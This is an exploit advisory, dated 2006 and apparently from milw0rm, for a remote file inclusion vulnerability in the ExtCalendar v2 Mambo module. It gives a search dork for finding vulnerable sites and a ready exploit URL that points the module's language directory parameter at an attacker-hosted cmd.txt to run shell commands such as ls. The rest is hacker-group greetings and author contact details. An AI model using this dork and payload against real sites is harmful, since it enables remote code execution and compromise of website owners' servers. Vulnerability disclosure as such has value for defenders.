30 lines
No EOL
1.1 KiB
Text
30 lines
No EOL
1.1 KiB
Text
--------------------------------------------------------------------------------
|
|
Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities
|
|
###############################################################################
|
|
|
|
Discovered By OLiBekaS
|
|
-----------------------------------------------------------------------------
|
|
|
|
dork : "powered by ExtCalendar v2"
|
|
Exploit :
|
|
http://[target]/[path]/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://[attacker]/cmd.txt?&cmd=ls
|
|
|
|
-----------------------------------------------------------------------------
|
|
|
|
greatz:
|
|
~~~~~
|
|
# Special greetz to my master effex and bEdAh`oTaK ( thank man )
|
|
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other
|
|
|
|
-------------------------------------------------------------------------------
|
|
|
|
Contact:
|
|
~~~~~~~
|
|
|
|
Nick: OLiBekaS
|
|
E-mail: olibekas[at]gmail[dot]Com
|
|
Homepage: http://bekas.6te.net
|
|
|
|
--------------------------------- [ eof ] ---------------------------------------
|
|
|
|
# milw0rm.com [2006-07-17] |